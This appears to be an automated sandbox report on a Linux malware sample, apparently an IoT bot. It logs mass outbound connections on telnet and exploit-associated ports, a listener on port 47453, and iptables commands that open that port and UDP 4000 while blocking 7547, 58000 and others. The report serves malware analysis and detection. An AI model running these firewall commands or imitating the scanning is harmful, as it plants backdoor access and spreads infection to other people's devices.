Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 160.221.21.0:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 53.184.19.200:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 198.9.196.56:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 85.221.238.78:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 143.1.224.175:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 171.153.71.56:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 174.51.201.83:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 13.163.7.33:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 203.223.110.147:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 136.38.16.27:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 47.254.200.229:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 190.227.232.240:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 79.37.180.218:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 46.200.62.22:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 73.9.241.254:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 177.176.214.85:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 156.167.89.28:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 211.166.254.195:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 66.218.10.63:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 139.151.132.72:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 217.50.165.81:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 75.82.144.224:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 135.140.27.106:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 212.63.97.36:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 205.162.45.253:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 213.252.178.60:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 48.56.36.74:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 71.38.218.33:2323
Source: global traffic	TCP traffic: 192.168.2.20:33868 -> 146.244.33.196:8080
Source: global traffic	TCP traffic: 192.168.2.20:57874 -> 131.7.179.240:8080
Source: global traffic	TCP traffic: 192.168.2.20:54196 -> 41.64.118.236:8080
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 188.176.86.229:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 212.167.165.252:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 122.243.242.25:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 111.0.125.36:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 185.50.62.97:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 59.172.13.97:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 188.200.140.122:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 115.42.52.37:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 183.16.231.232:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 206.17.179.29:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 112.254.112.252:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 174.47.48.224:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 66.178.106.107:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 88.38.36.48:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 207.253.148.221:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 63.43.183.132:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 76.81.222.62:2323
Source: global traffic	TCP traffic: 192.168.2.20:35476 -> 220.165.204.143:8080
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 158.101.147.68:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 36.47.126.190:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 163.68.243.17:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 87.254.248.72:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 104.46.233.185:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 38.8.33.243:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 75.210.106.74:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 202.213.251.249:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 190.178.70.246:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 135.158.105.90:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 193.73.223.232:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 119.91.55.78:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 186.19.26.160:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 95.196.154.222:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 197.185.25.16:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 202.65.105.27:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 32.153.134.237:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 193.238.117.21:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 89.27.104.84:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 135.175.116.15:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 53.252.135.112:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 148.42.51.67:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 220.187.21.100:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 75.196.238.210:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 88.220.144.120:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 36.139.136.230:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 86.106.153.130:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 187.196.99.229:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 121.130.64.26:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 101.183.25.205:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 53.164.22.0:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 110.62.230.0:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 133.137.4.253:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 183.168.194.168:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 32.243.64.41:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 126.3.149.148:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 163.166.58.36:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 24.240.185.140:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 61.199.114.26:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 20.211.166.14:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 27.207.136.28:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 120.34.226.148:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 61.61.71.43:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 82.89.10.174:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 141.34.29.8:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 19.224.224.230:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 13.185.66.112:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 168.75.205.4:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 173.115.134.194:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 213.125.161.32:2323
Source: global traffic	TCP traffic: 192.168.2.20:35492 -> 5.187.144.78:7574
Source: global traffic	TCP traffic: 192.168.2.20:37100 -> 190.206.177.195:7574
Source: global traffic	TCP traffic: 192.168.2.20:58838 -> 60.182.4.178:49152
Source: global traffic	TCP traffic: 192.168.2.20:36900 -> 34.226.216.9:52869
Source: global traffic	TCP traffic: 192.168.2.20:54874 -> 45.66.168.229:81
Source: global traffic	TCP traffic: 192.168.2.20:49722 -> 148.119.94.202:8080
Source: global traffic	TCP traffic: 192.168.2.20:60760 -> 124.100.92.68:8080
Source: global traffic	TCP traffic: 192.168.2.20:47312 -> 168.144.37.63:7574
Source: global traffic	TCP traffic: 192.168.2.20:55472 -> 31.65.174.196:8080
Source: global traffic	TCP traffic: 192.168.2.20:59848 -> 179.86.197.224:8443
Source: global traffic	TCP traffic: 192.168.2.20:55356 -> 79.74.222.218:8080
Source: global traffic	TCP traffic: 192.168.2.20:35232 -> 12.118.224.5:8080
Source: global traffic	TCP traffic: 192.168.2.20:49328 -> 194.139.111.238:8080
Source: global traffic	TCP traffic: 192.168.2.20:41840 -> 26.34.213.157:49152
Source: global traffic	TCP traffic: 192.168.2.20:36462 -> 161.230.34.156:37215
Source: global traffic	TCP traffic: 192.168.2.20:37816 -> 37.98.108.113:81
Source: global traffic	TCP traffic: 192.168.2.20:39546 -> 158.143.122.210:52869
Source: global traffic	TCP traffic: 192.168.2.20:40436 -> 193.36.5.127:49152
Source: global traffic	TCP traffic: 192.168.2.20:33418 -> 31.20.82.249:8080
Source: global traffic	TCP traffic: 192.168.2.20:35740 -> 161.127.238.198:81
Source: global traffic	TCP traffic: 192.168.2.20:50382 -> 136.113.197.35:8443
Source: global traffic	TCP traffic: 192.168.2.20:48226 -> 83.41.228.148:8443
Source: global traffic	TCP traffic: 192.168.2.20:41260 -> 37.126.224.143:52869
Source: global traffic	TCP traffic: 192.168.2.20:53138 -> 101.227.190.33:5555
Source: global traffic	TCP traffic: 192.168.2.20:48044 -> 111.240.142.16:7574
Source: global traffic	TCP traffic: 192.168.2.20:55242 -> 158.38.176.82:8080
Source: global traffic	TCP traffic: 192.168.2.20:58760 -> 140.134.218.225:8080
Source: global traffic	TCP traffic: 192.168.2.20:49084 -> 184.61.35.161:5555
Source: global traffic	TCP traffic: 192.168.2.20:51112 -> 116.25.201.150:8080
Source: global traffic	TCP traffic: 192.168.2.20:59970 -> 196.198.124.215:8443
Source: global traffic	TCP traffic: 192.168.2.20:50028 -> 52.16.235.82:8080
Source: global traffic	TCP traffic: 192.168.2.20:42628 -> 58.30.72.177:49152
Source: global traffic	TCP traffic: 192.168.2.20:35864 -> 173.110.61.196:7574
Source: global traffic	TCP traffic: 192.168.2.20:59006 -> 135.4.185.97:8080
Source: global traffic	TCP traffic: 192.168.2.20:38830 -> 143.147.160.1:81
Source: global traffic	TCP traffic: 192.168.2.20:44456 -> 94.135.178.87:81
Source: global traffic	TCP traffic: 192.168.2.20:58872 -> 72.99.199.177:49152
Source: global traffic	TCP traffic: 192.168.2.20:58790 -> 151.74.246.170:81
Source: global traffic	TCP traffic: 192.168.2.20:55876 -> 78.175.116.20:52869
Source: global traffic	TCP traffic: 192.168.2.20:36794 -> 202.81.140.0:81
Source: global traffic	TCP traffic: 192.168.2.20:60620 -> 53.134.248.119:52869
Source: global traffic	TCP traffic: 192.168.2.20:55554 -> 26.147.179.51:52869
Source: global traffic	TCP traffic: 192.168.2.20:54754 -> 176.102.246.130:5555
Source: global traffic	TCP traffic: 192.168.2.20:39122 -> 56.151.171.111:8080
Source: global traffic	TCP traffic: 192.168.2.20:48678 -> 113.254.69.147:7574
Source: global traffic	TCP traffic: 192.168.2.20:48330 -> 206.27.21.74:5555
Source: global traffic	TCP traffic: 192.168.2.20:48038 -> 39.252.230.232:8443
Source: global traffic	TCP traffic: 192.168.2.20:55860 -> 190.71.92.106:49152
Source: global traffic	TCP traffic: 192.168.2.20:43970 -> 149.145.117.99:5555
Source: global traffic	TCP traffic: 192.168.2.20:46000 -> 44.188.108.249:8443
Source: global traffic	TCP traffic: 192.168.2.20:60688 -> 8.132.20.149:8443
Source: global traffic	TCP traffic: 192.168.2.20:35494 -> 74.119.4.125:8443
Source: global traffic	TCP traffic: 192.168.2.20:42656 -> 22.158.74.158:5555
Source: global traffic	TCP traffic: 192.168.2.20:35660 -> 216.40.146.138:8080
Source: global traffic	TCP traffic: 192.168.2.20:58458 -> 126.239.116.72:8080
Source: global traffic	TCP traffic: 192.168.2.20:33462 -> 208.33.128.23:8080
Source: global traffic	TCP traffic: 192.168.2.20:54130 -> 222.204.252.34:5555
Source: global traffic	TCP traffic: 192.168.2.20:51074 -> 44.141.251.112:49152
Source: global traffic	TCP traffic: 192.168.2.20:59086 -> 155.192.173.3:49152
Source: global traffic	TCP traffic: 192.168.2.20:50826 -> 92.82.252.190:5555
Source: global traffic	TCP traffic: 192.168.2.20:46708 -> 34.144.238.160:8080
Source: global traffic	TCP traffic: 192.168.2.20:46958 -> 98.137.65.157:52869
Source: global traffic	TCP traffic: 192.168.2.20:60756 -> 72.89.219.141:8443
Source: global traffic	TCP traffic: 192.168.2.20:36870 -> 216.127.243.47:8080
Source: global traffic	TCP traffic: 192.168.2.20:41072 -> 180.119.171.72:5555
Source: global traffic	TCP traffic: 192.168.2.20:51280 -> 173.235.230.238:8443
Source: global traffic	TCP traffic: 192.168.2.20:47058 -> 207.230.142.20:8080
Source: global traffic	TCP traffic: 192.168.2.20:37854 -> 140.64.139.164:8080
Source: global traffic	TCP traffic: 192.168.2.20:55376 -> 51.170.75.171:37215
Source: global traffic	TCP traffic: 192.168.2.20:45412 -> 200.164.44.27:37215
Source: global traffic	TCP traffic: 192.168.2.20:48688 -> 51.238.146.201:81
Source: global traffic	TCP traffic: 192.168.2.20:53756 -> 180.176.10.237:81
Source: global traffic	TCP traffic: 192.168.2.20:38876 -> 73.43.76.24:5555
Source: global traffic	TCP traffic: 192.168.2.20:34170 -> 85.61.49.109:8080
Source: global traffic	TCP traffic: 192.168.2.20:58048 -> 19.79.231.29:8080
Source: global traffic	TCP traffic: 192.168.2.20:40964 -> 70.113.63.226:8443
Source: global traffic	TCP traffic: 192.168.2.20:52226 -> 211.44.209.80:8443
Source: global traffic	TCP traffic: 192.168.2.20:49224 -> 157.5.200.51:7574
Source: global traffic	TCP traffic: 192.168.2.20:56926 -> 56.179.20.91:49152
Source: global traffic	TCP traffic: 192.168.2.20:37358 -> 75.244.195.175:8080
Source: global traffic	TCP traffic: 192.168.2.20:42222 -> 71.113.61.118:49152
Source: global traffic	TCP traffic: 192.168.2.20:36356 -> 96.105.199.49:7574
Source: global traffic	TCP traffic: 192.168.2.20:48666 -> 219.171.175.178:49152
Source: global traffic	TCP traffic: 192.168.2.20:48680 -> 152.77.109.165:81
Source: global traffic	TCP traffic: 192.168.2.20:49400 -> 120.3.130.253:8443
Source: global traffic	TCP traffic: 192.168.2.20:38714 -> 222.35.115.231:52869
Source: global traffic	TCP traffic: 192.168.2.20:48808 -> 29.191.42.58:8080
Source: global traffic	TCP traffic: 192.168.2.20:60036 -> 93.26.114.163:8080
Source: global traffic	TCP traffic: 192.168.2.20:48434 -> 43.76.242.175:8080
Source: global traffic	TCP traffic: 192.168.2.20:36502 -> 23.165.91.76:5555
Source: global traffic	TCP traffic: 192.168.2.20:58162 -> 42.4.201.2:52869
Source: global traffic	TCP traffic: 192.168.2.20:53462 -> 167.243.21.26:7574
Source: global traffic	TCP traffic: 192.168.2.20:40934 -> 166.71.33.66:37215
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 126.173.187.250:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 212.251.42.151:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 54.26.235.219:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 115.36.198.11:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 163.136.89.118:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 106.43.189.61:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 39.236.0.254:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 209.120.183.182:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 184.238.11.237:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 9.151.116.206:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 124.181.145.82:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 182.106.163.140:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 90.179.152.71:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 77.253.34.142:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 106.160.177.38:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 83.190.188.81:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 12.199.143.201:2323
Source: global traffic	TCP traffic: 192.168.2.20:32920 -> 97.191.181.246:52869
Source: global traffic	TCP traffic: 192.168.2.20:35860 -> 67.159.181.184:8080
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 206.165.72.172:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 125.35.75.60:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 187.155.226.130:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 178.123.15.193:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 217.205.168.132:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 101.177.86.6:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 59.66.159.74:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 70.40.129.75:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 178.88.210.245:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 213.48.178.169:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 195.49.212.151:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 27.204.236.161:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 206.39.31.252:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 198.8.107.227:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 114.219.83.119:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 164.147.110.159:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 209.143.229.253:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 104.164.201.197:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 38.155.199.107:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 46.120.23.248:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 182.223.61.33:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 8.198.203.74:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 213.120.220.137:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 193.120.5.123:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 87.78.13.108:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 140.231.227.195:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 170.134.88.147:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 185.120.151.60:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 93.102.109.79:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 190.215.114.237:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 207.17.7.126:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 116.72.59.199:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 76.123.98.28:2323
Source: global traffic	TCP traffic: 192.168.2.20:53474 -> 190.126.252.140:52869
Source: global traffic	TCP traffic: 192.168.2.20:49638 -> 118.144.15.19:37215
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 179.67.151.112:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 72.214.7.65:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 71.199.207.110:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 191.185.159.193:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 57.124.145.13:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 145.200.155.76:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 34.110.165.234:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 67.241.120.56:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 2.254.169.42:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 145.25.76.245:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 209.162.247.31:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 44.185.101.89:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 189.147.158.128:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 109.181.142.240:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 17.233.5.252:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 36.185.136.86:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 103.115.64.224:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 65.74.248.65:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 119.84.157.150:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 166.102.52.220:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 156.151.56.37:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 9.208.247.147:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 149.52.37.158:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 141.199.106.142:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 176.146.163.79:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 91.191.81.144:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 213.102.196.97:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 102.201.117.82:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 97.107.48.173:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 189.51.27.16:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 188.130.4.252:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 160.94.210.98:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 46.204.100.29:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 87.112.133.194:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 2.95.37.31:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 183.104.203.213:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 123.222.206.245:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 167.76.204.52:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 57.27.248.252:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 36.66.112.200:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 212.89.141.221:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 135.192.171.157:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 23.178.112.227:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 122.83.37.215:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 93.198.168.33:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 83.169.254.83:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 197.49.14.136:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 151.227.168.124:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 68.23.39.237:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 122.145.165.234:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 110.142.83.223:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 196.158.255.105:1023
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 112.102.181.25:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 78.178.152.141:2323
Source: global traffic	TCP traffic: 192.168.2.20:44211 -> 123.180.27.243:2323

Source: /tmp/bin.sh (PID: 6815)

Socket: 0.0.0.0::47453

Jump to behavior

Source: /bin/sh (PID: 6827)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6857)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6863)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6897)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6913)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6935)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6948)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6973)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6992)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6995)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6998)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7010)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7067)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7093)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7122)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7145)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7163)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7179)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7200)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7216)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7230)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7248)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7261)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7290)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 7316)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 7319)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 7327)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 7351)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 7378)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 7405)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 7426)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 7439)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT	Jump to behavior

